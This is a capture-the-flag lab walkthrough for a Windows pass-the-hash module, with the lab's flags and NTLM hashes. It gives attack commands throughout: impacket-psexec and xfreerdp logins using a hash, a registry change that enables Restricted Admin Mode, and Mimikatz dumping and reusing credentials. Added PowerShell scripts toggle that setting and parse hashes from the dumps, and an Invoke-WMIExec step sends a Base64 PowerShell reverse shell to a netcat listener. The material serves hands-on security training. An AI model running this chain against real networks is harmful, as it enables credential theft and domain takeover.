> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-hash-pth/questions.md).

# Questions

## Pass the Hash — Lab Walkthrough

### Environment

| Host | Role              | Internal IP (172.16.1.0/24) |
| ---- | ----------------- | --------------------------- |
| MS01 | Foothold machine  | 172.16.1.5                  |
| DC01 | Domain Controller | 172.16.1.10                 |

MS01 also has a Pwnbox-facing interface, `10.129.97.66`, which is the address the `impacket-psexec` and `xfreerdp` commands below target. DC01 is only reachable from MS01's internal interface, which is why Q6 pivots through MS01.

**Starting hash:** `Administrator:30B3783CE2ABF1AF70F77D0660CF3453`

***

### Q1 — Initial Access via PtH

Used `impacket-psexec` to authenticate to MS01's Pwnbox-facing address with the Administrator NTLM hash and get an interactive shell (it runs as SYSTEM). `-hashes` takes `LMHASH:NTHASH`; the LM half is left empty, hence the leading colon. psexec needs local admin on the target: it uploads a service binary to `ADMIN$` and installs a service to run it, so it is loud on the target (a service-install event is written to the System log).

```bash
impacket-psexec administrator@10.129.97.66 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```

```cmd
type C:\pth.txt
```

**Flag:** `G3t_4CCE$$_V1@_PTH`

***

### Q2 — RDP via PtH

RDP over pass-the-hash only works when **Restricted Admin Mode** is enabled on the target. It is controlled by the `DisableRestrictedAdmin` value (`REG_DWORD`) under `HKLM\System\CurrentControlSet\Control\Lsa`: the value is absent by default, which leaves the mode off, and it must exist and be `0` for the RDP service to accept an NT hash in place of a password. Setting it needs an existing admin shell on the target (here, the psexec session from Q1).

**Enable Restricted Admin Mode (from existing shell):**

```cmd
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0
```

**Connect via RDP with hash:**

```bash
xfreerdp /v:10.129.97.66 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453
```

**Answer:** `DisableRestrictedAdmin`
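The `reg add` above sets the value blindly. The following is an added example, not part of the lab page or of any tool it uses: a small PowerShell helper that reads the current `DisableRestrictedAdmin` state (absent, `1`, or `0`), enables Restricted Admin Mode, and can revert it. It is meant to run from the elevated shell obtained in Q1; the registry path, the target IP and the hash are the page's own values, and `/cert:ignore` on the xfreerdp line is an optional flag for lab hosts with self-signed RDP certificates.

```powershell
# Added example (not from the lab page): check and set Restricted Admin Mode on the
# foothold host before attempting RDP pass-the-hash. Run from an elevated shell on MS01.
#   value absent or 1 -> Restricted Admin disabled, xfreerdp /pth fails with an
#                        "account restrictions" style error
#   value 0           -> Restricted Admin enabled, the RDP service accepts an NT hash
$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RestrictedAdminState {
    # Returns 'Enabled', 'Disabled' or 'NotConfigured'.
    # NotConfigured (value absent) is the Windows default and behaves like Disabled.
    $v = Get-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue
    if ($null -eq $v) { return 'NotConfigured' }
    if ($v.DisableRestrictedAdmin -eq 0) { return 'Enabled' }
    return 'Disabled'
}

function Enable-RestrictedAdmin {
    # Same effect as:
    #   reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
    New-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -PropertyType DWord -Value 0 -Force | Out-Null
    Get-RestrictedAdminState
}

function Disable-RestrictedAdmin {
    # Clean-up after the lab (or hardening for a defender): remove the value so the
    # default, Restricted Admin off, applies again.
    Remove-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue
    Get-RestrictedAdminState
}

"Before: $(Get-RestrictedAdminState)"
"After : $(Enable-RestrictedAdmin)"

# Then, from the attacker host (target and hash from the lab page):
#   xfreerdp /v:10.129.97.66 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /cert:ignore
```

Restricted Admin Mode exists to keep credentials off the RDP target; its trade-off is exactly this attack, so a defender who sees `DisableRestrictedAdmin` flip to `0` outside of policy (Sysmon Event ID 13 on that value is the usual signal) should treat it as attacker preparation for RDP pass-the-hash.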

***

### Q3 — Extract Hashes with Mimikatz (from RDP session)

Once inside the RDP session, open an elevated prompt (`privilege::debug` needs SeDebugPrivilege, which only an elevated administrator has), navigate to `C:\tools` and run Mimikatz.

```cmd
cd C:\tools
mimikatz.exe
```

```
privilege::debug
sekurlsa::logonpasswords
```

Look for David's `msv` block in the output; its `NTLM` line is the NT hash that pass-the-hash uses:

```
Username : david
Domain   : INLANEFREIGHT
NTLM     : c39f2beb3d2ec06a62cb887fb391dee0
```

**David's NTLM hash:** `c39f2beb3d2ec06a62cb887fb391dee0`
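A full `sekurlsa::logonpasswords` dump on a busy host is long, and picking hashes out of it by eye is error-prone. The following is an added example, not from the lab page or from Mimikatz: a PowerShell filter that reads the dump line by line, keeps the `Username` / `Domain` / `NTLM` triplets that the `msv` provider prints, drops computer accounts and `(null)` entries, and de-duplicates. The sample input is a constructed, abbreviated dump; the `david` and `julio` hashes in it are the ones the page shows, while the `MS01$` hash is made up.

```powershell
# Added example (not part of the lab page): turn a raw sekurlsa::logonpasswords dump
# into a de-duplicated list of NT hashes. On MS01, after an elevated prompt, feed it
# directly from mimikatz:
#   .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" | Get-NtlmFromMimikatz
function Get-NtlmFromMimikatz {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline = $true)][string[]]$Line)
    begin {
        $user = $null; $domain = $null
        $seen = @{}          # "domain\user" keys already emitted
        $out  = @()
    }
    process {
        foreach ($l in $Line) {
            switch -Regex ($l) {
                '^\s*\*\s*Username\s*:\s*(.+?)\s*$' { $user = $Matches[1]; $domain = $null }
                '^\s*\*\s*Domain\s*:\s*(.+?)\s*$'   { $domain = $Matches[1] }
                '^\s*\*\s*NTLM\s*:\s*([0-9a-fA-F]{32})\s*$' {
                    # Only the msv block prints an NTLM line, so it closes one credential record.
                    # wdigest/kerberos blocks repeat Username/Domain but carry a Password line instead.
                    if ($user -and $user -ne '(null)' -and $user -notlike '*$') {
                        $key = "$domain\$user".ToLower()
                        if (-not $seen.ContainsKey($key)) {
                            $seen[$key] = $true
                            $out += [pscustomobject]@{ Domain = $domain; User = $user; NTLM = $Matches[1].ToLower() }
                        }
                    }
                }
            }
        }
    }
    end { $out }
}

# Constructed sample input (abbreviated mimikatz output). The MS01$ hash is invented;
# david's and julio's are the values the lab page reports.
$sample = @'
Authentication Id : 0 ; 340050 (00000000:00053052)
Session           : RemoteInteractive from 2
User Name         : david
Domain            : INLANEFREIGHT
        msv :
         [00000003] Primary
         * Username   : david
         * Domain     : INLANEFREIGHT
         * NTLM       : c39f2beb3d2ec06a62cb887fb391dee0
        wdigest :
         * Username   : david
         * Domain     : INLANEFREIGHT
         * Password   : (null)
        kerberos :
         * Username   : david
         * Domain     : INLANEFREIGHT.HTB
         * Password   : (null)
Authentication Id : 0 ; 997 (00000000:000003e5)
User Name         : MS01$
Domain            : INLANEFREIGHT
        msv :
         * Username   : MS01$
         * Domain     : INLANEFREIGHT
         * NTLM       : 0123456789abcdef0123456789abcdef
Authentication Id : 0 ; 412211 (00000000:00064a33)
User Name         : julio
Domain            : INLANEFREIGHT
        msv :
         * Username   : julio
         * Domain     : INLANEFREIGHT
         * NTLM       : 64F12CDDAA88057E06A81B54E73B949B
'@

$sample -split "`r?`n" | Get-NtlmFromMimikatz | Format-Table -AutoSize
# Expected rows: INLANEFREIGHT\david and INLANEFREIGHT\julio with their hashes; MS01$ is dropped.
```

Each row is exactly what the next steps consume: `User` and `NTLM` go into `sekurlsa::pth /user:<User> /rc4:<NTLM>` (Q4, Q5) or `Invoke-WMIExec -Username <User> -Hash <NTLM>` (Q6). The computer-account filter is a convenience, not a rule; drop it if you want `MS01$` for other techniques.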

***

### Q4 — Access David's Share via PtH

Use Mimikatz `sekurlsa::pth` to spawn a new `cmd.exe` whose logon session carries David's NT hash in place of the current user's cached credentials, then access the share from that window. `/rc4` and `/ntlm` are synonyms for the hash; `/domain` must be supplied so the NTLM exchange (and any Kerberos RC4 exchange) names the right account.

```cmd
mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe"
```

A new cmd window opens. Locally it still runs as the user who launched Mimikatz (`whoami` reports Administrator); only outbound network authentication from it goes out as David, which is all the share access needs:

```cmd
dir \\dc01\david
type \\dc01\david\david.txt
```

**Flag:** `D3V1d_Fl5g_is_Her3`

***

### Q5 — Access Julio's Share via PtH

Julio's hash comes from the same `sekurlsa::logonpasswords` dump as David's (re-run the dump if Julio's session was not present the first time), then use `sekurlsa::pth` the same way.

```cmd
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe"
```

```cmd
type \\dc01\julio\julio.txt
```

**Flag:** `JuL1()_SH@re_fl@g`

***

### Q6 — Reverse Shell from DC01 via Invoke-TheHash

**Scenario:** MS01 can reach DC01, but your Pwnbox cannot. Use MS01 as a pivot — force DC01 to call back to MS01 with a reverse shell.

#### Step 1 — Open Two PowerShell Windows on MS01

* **Window A:** `C:\tools\Invoke-TheHash\` — runs the attack
* **Window B:** `C:\tools\` — runs the netcat listener

#### Step 2 — Start Listener (Window B)

```powershell
.\nc.exe -lvp 4444
```

#### Step 3 — Get MS01's Internal IP

```powershell
ipconfig
# Note the internal NIC IP: 172.16.1.5
# DC01 must call back to this IP, not your Pwnbox
```

#### Step 4 — Generate Reverse Shell Payload

Go to [revshells.com](https://www.revshells.com/):

* LHOST: `172.16.1.5`
* LPORT: `4444`
* Type: **PowerShell #3 (Base64)**

Copy the generated Base64 command. It is the script UTF-16LE-encoded and then Base64-encoded, which is what `powershell -e` expects; do not re-encode or re-wrap it.

#### Step 5 — Execute via Invoke-TheHash (Window A)

```powershell
Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <Base64_payload>"
```

#### Step 6 — Catch Shell and Read Flag (Window B)

`Invoke-WMIExec` only reports whether the `Win32_Process.Create` call succeeded and returns no command output, so the only feedback is the reverse shell arriving at the netcat listener in Window B. From that shell:

```cmd
type C:\julio\flag.txt
```

**Flag:** `JuL1()_N3w_fl@g`

***

### Full Attack Chain

```
impacket-psexec (hash) → MS01 shell
        │
        └── Set DisableRestrictedAdmin=0 (Restricted Admin Mode on)
                │
                └── xfreerdp /pth → RDP session on MS01
                        │
                        └── Mimikatz sekurlsa::logonpasswords
                                │
                                ├── david hash → sekurlsa::pth → \\dc01\david
                                └── julio hash → sekurlsa::pth → \\dc01\julio
                                        │
                                        └── Invoke-WMIExec (julio hash)
                                                → DC01 reverse shell → MS01:4444
                                                        → C:\julio\flag.txt
```

***

### Key Takeaways

* `sekurlsa::logonpasswords` reads the credential material LSASS still holds for its logon sessions (interactive, RDP, service and network logons), so run it right after landing on a host to harvest lateral-movement material
* `sekurlsa::pth` does not hand you the target user's token: it starts a process in a new logon session and overwrites that session's cached NT hash (also used as the Kerberos RC4 key) in LSASS with the one you supply, so local identity is unchanged while every network authentication from that window goes out as the target user
* Pivot awareness: always run `ipconfig` before generating reverse-shell payloads; use the interface IP that the target can actually reach, not your external IP
* WMI execution via Invoke-TheHash is quieter than psexec-style SMB execution: no binary dropped in `ADMIN$` and no service installed, just a `Win32_Process.Create` call that spawns the command as a child of `WmiPrvSE.exe`. It is not invisible: the network logon (Event ID 4624, logon type 3) and the process creation are still logged
* RDP PtH requires the registry change first; without it the connection is refused with an account-restriction error (the "blank passwords / policy restrictions" message)

